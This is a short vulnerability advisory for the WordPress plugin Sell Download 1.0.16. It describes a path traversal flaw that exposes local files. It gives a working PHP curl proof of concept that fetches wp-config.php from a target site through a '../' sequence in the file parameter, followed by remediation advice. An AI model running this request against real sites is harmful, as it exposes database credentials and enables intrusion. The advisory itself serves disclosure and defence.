WordPress Sell Download 1.0.16 Local File Disclosure Vulnerability


 Wordpress plugin Sell Download v1.0.16 is suffer from Local File Disclosure Vulnerability remote attacker can disclosure some local files.


// page : sell-downloads.php

// lines : 119, 130.. 131

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../../../../../../.././wp-config.php");

curl_setopt($ch, CURLOPT_HTTPGET, 1);

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");

$buf = curl_exec ($ch);



echo $buf;



    1. Modify the source code, strict filtering parameters similar "../" and "..\" and all special characters that May cause the Local File Inclusion attack;

    2. If you have purchased NGAF appliance, update WAF signature database to version 20151218 or above.